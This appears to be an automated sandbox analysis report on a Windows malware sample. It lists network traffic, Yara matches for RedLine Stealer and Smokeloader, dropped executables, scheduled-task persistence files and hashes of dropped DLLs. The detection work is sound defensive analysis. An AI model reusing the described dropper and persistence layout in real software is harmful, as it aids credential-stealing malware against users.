Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59120 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59155 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63456 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63461
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63460
Source: unknown	Network traffic detected: HTTP traffic on port 59317 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59117 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59118
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59117
Source: unknown	Network traffic detected: HTTP traffic on port 59098 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59119
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59125
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59124
Source: unknown	Network traffic detected: HTTP traffic on port 59169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63459
Source: unknown	Network traffic detected: HTTP traffic on port 59123 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59314 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59087
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59120
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59123
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59084
Source: unknown	Network traffic detected: HTTP traffic on port 59320 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59086
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63454
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63453
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63456
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63455
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59082
Source: unknown	Network traffic detected: HTTP traffic on port 59102 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63458
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59081
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63457
Source: unknown	Network traffic detected: HTTP traffic on port 63459 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59158 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59318 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59131 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59007
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59015
Source: unknown	Network traffic detected: HTTP traffic on port 59119 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59099
Source: unknown	Network traffic detected: HTTP traffic on port 59315 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59098
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59131
Source: unknown	Network traffic detected: HTTP traffic on port 59032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59130
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59096
Source: unknown	Network traffic detected: HTTP traffic on port 63391 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63406 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63454 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59153 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59096 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63649 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63514
Source: unknown	Network traffic detected: HTTP traffic on port 59312 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63518
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59023
Source: unknown	Network traffic detected: HTTP traffic on port 63652 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59125 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59100 -> 443

Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.95.31.18:443 -> 192.168.2.6:58976 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.6:58977 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:58978 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.6:58979 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.6:58980 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:59007 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:59023 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:59033 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.32.76:443 -> 192.168.2.6:59081 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.159.68:443 -> 192.168.2.6:59082 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.42.73.29:443 -> 192.168.2.6:59084 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.42.73.29:443 -> 192.168.2.6:59086 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:59087 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:59096 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:59099 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.42.73.29:443 -> 192.168.2.6:59102 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.6:59101 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.65.39.85:443 -> 192.168.2.6:59100 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:59117 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:59119 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:59120 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:59118 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:59123 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:59152 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:59155 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59162 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59160 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59159 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59163 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59158 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59167 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59169 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59166 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59168 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:63406 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:63456 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:63455 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:63454 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:63457 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:63458 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:63453 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:63460 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:63459 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:63461 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:63514 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.189.173.27:443 -> 192.168.2.6:63518 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:63649 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59316 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59312 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59317 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59315 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59313 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59314 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59320 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59318 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59319 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:59333 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000024.00000002.3088875325.0000000002740000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000B.00000002.3085036724.00000000026C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000024.00000002.3088348052.00000000026F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000B.00000002.3085641302.000000000270D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown

PE file contains section with special chars

Source: 6SoKuOqyNh.exe	Static PE information: section name:
Source: 6SoKuOqyNh.exe	Static PE information: section name: .idata
Source: 6SoKuOqyNh.exe	Static PE information: section name:
Source: explorti.exe.2.dr	Static PE information: section name:
Source: explorti.exe.2.dr	Static PE information: section name: .idata
Source: explorti.exe.2.dr	Static PE information: section name:
Source: random[1].exe.11.dr	Static PE information: section name:
Source: random[1].exe.11.dr	Static PE information: section name: .idata
Source: random[1].exe.11.dr	Static PE information: section name:
Source: enter[1].exe.11.dr	Static PE information: section name:
Source: enter[1].exe.11.dr	Static PE information: section name: .idata
Source: enter[1].exe.11.dr	Static PE information: section name:
Source: RoamingHJKECAAAFH.exe.11.dr	Static PE information: section name:
Source: RoamingHJKECAAAFH.exe.11.dr	Static PE information: section name: .idata
Source: RoamingHJKECAAAFH.exe.11.dr	Static PE information: section name:
Source: RoamingFHJDBKJKFI.exe.11.dr	Static PE information: section name:
Source: RoamingFHJDBKJKFI.exe.11.dr	Static PE information: section name: .idata
Source: RoamingFHJDBKJKFI.exe.11.dr	Static PE information: section name:
Source: axplong.exe.47.dr	Static PE information: section name:
Source: axplong.exe.47.dr	Static PE information: section name: .idata
Source: axplong.exe.47.dr	Static PE information: section name:

Abnormal high CPU Usage

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Process Stats: CPU usage > 49%

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6AB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	11_2_6C6AB700
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6AB8C0 rand_s,NtQueryVirtualMemory,	11_2_6C6AB8C0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6AB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	11_2_6C6AB910
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C64F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	11_2_6C64F280

Creates files inside the system directory

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	File created: C:\Windows\Tasks\explorti.job			Jump to behavior
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	File created: C:\Windows\Tasks\axplong.job

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6435A0	11_2_6C6435A0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C655440	11_2_6C655440
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6B545C	11_2_6C6B545C
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6B542B	11_2_6C6B542B
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6BAC00	11_2_6C6BAC00
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C685C10	11_2_6C685C10
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C692C10	11_2_6C692C10
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C64D4E0	11_2_6C64D4E0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C686CF0	11_2_6C686CF0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6564C0	11_2_6C6564C0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C66D4D0	11_2_6C66D4D0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6A34A0	11_2_6C6A34A0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6AC4A0	11_2_6C6AC4A0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C656C80	11_2_6C656C80
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C65FD00	11_2_6C65FD00
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C670512	11_2_6C670512
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C66ED10	11_2_6C66ED10
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6A85F0	11_2_6C6A85F0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C680DD0	11_2_6C680DD0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6B6E63	11_2_6C6B6E63
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C64C670	11_2_6C64C670
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C664640	11_2_6C664640
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C692E4E	11_2_6C692E4E
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C669E50	11_2_6C669E50
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C683E50	11_2_6C683E50
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6A9E30	11_2_6C6A9E30
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C695600	11_2_6C695600
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C687E10	11_2_6C687E10
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6B76E3	11_2_6C6B76E3
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C64BEF0	11_2_6C64BEF0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C65FEF0	11_2_6C65FEF0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6A4EA0	11_2_6C6A4EA0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6AE680	11_2_6C6AE680
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C665E90	11_2_6C665E90
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C659F00	11_2_6C659F00
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C687710	11_2_6C687710
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C64DFE0	11_2_6C64DFE0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C676FF0	11_2_6C676FF0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6977A0	11_2_6C6977A0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C68F070	11_2_6C68F070
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C668850	11_2_6C668850
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C66D850	11_2_6C66D850
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C68B820	11_2_6C68B820
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C694820	11_2_6C694820
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C657810	11_2_6C657810
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C66C0E0	11_2_6C66C0E0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6858E0	11_2_6C6858E0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6B50C7	11_2_6C6B50C7
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6760A0	11_2_6C6760A0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C65D960	11_2_6C65D960
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C69B970	11_2_6C69B970
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6BB170	11_2_6C6BB170
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C66A940	11_2_6C66A940
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C64C9A0	11_2_6C64C9A0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C67D9B0	11_2_6C67D9B0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C685190	11_2_6C685190
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6A2990	11_2_6C6A2990
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C689A60	11_2_6C689A60
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C661AF0	11_2_6C661AF0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C68E2F0	11_2_6C68E2F0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C688AC0	11_2_6C688AC0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6422A0	11_2_6C6422A0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C674AA0	11_2_6C674AA0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C65CAB0	11_2_6C65CAB0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6B2AB0	11_2_6C6B2AB0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6BBA90	11_2_6C6BBA90
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C65C370	11_2_6C65C370
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C645340	11_2_6C645340
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C68D320	11_2_6C68D320
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6B53C8	11_2_6C6B53C8
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C64F380	11_2_6C64F380
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6FAC60	11_2_6C6FAC60
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C7CAC30	11_2_6C7CAC30
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C7B6C00	11_2_6C7B6C00
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C74ECD0	11_2_6C74ECD0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6EECC0	11_2_6C6EECC0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C7BED70	11_2_6C7BED70
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C87CDC0	11_2_6C87CDC0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C878D20	11_2_6C878D20
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C81AD50	11_2_6C81AD50
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6F4DB0	11_2_6C6F4DB0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C786D90	11_2_6C786D90
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C78EE70	11_2_6C78EE70
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C7D0E20	11_2_6C7D0E20
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6FAEC0	11_2_6C6FAEC0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C790EC0	11_2_6C790EC0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C776E90	11_2_6C776E90
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C7B2F70	11_2_6C7B2F70
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C838FB0	11_2_6C838FB0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C75EF40	11_2_6C75EF40
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6F6F10	11_2_6C6F6F10
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C7CEFF0	11_2_6C7CEFF0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6F0FE0	11_2_6C6F0FE0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C830F20	11_2_6C830F20
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6FEFB0	11_2_6C6FEFB0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C7C4840	11_2_6C7C4840
Source: C:\Users\user\1000003002\d27375200a.exe	Code function: 12_2_0040C898	12_2_0040C898
Source: C:\Users\user\1000003002\d27375200a.exe	Code function: 12_2_0040E950	12_2_0040E950
Source: C:\Users\user\1000003002\d27375200a.exe	Code function: 12_2_00410910	12_2_00410910
Source: C:\Users\user\1000003002\d27375200a.exe	Code function: 12_2_004109D9	12_2_004109D9
Source: C:\Users\user\1000003002\d27375200a.exe	Code function: 12_2_004105E0	12_2_004105E0
Source: C:\Users\user\1000003002\d27375200a.exe	Code function: 12_2_00411580	12_2_00411580
Source: C:\Users\user\1000003002\d27375200a.exe	Code function: 12_2_00410993	12_2_00410993
Source: C:\Users\user\1000003002\d27375200a.exe	Code function: 12_2_00410600	12_2_00410600
Source: C:\Users\user\1000003002\d27375200a.exe	Code function: 12_2_0040B347	12_2_0040B347
Source: C:\Users\user\1000003002\d27375200a.exe	Code function: 12_2_0040F3C8	12_2_0040F3C8

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: String function: 00404610 appears 316 times
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: String function: 6C6894D0 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: String function: 6C67CBE8 appears 134 times

Uses 32bit PE files

Source: 6SoKuOqyNh.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 00000024.00000002.3088875325.0000000002740000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
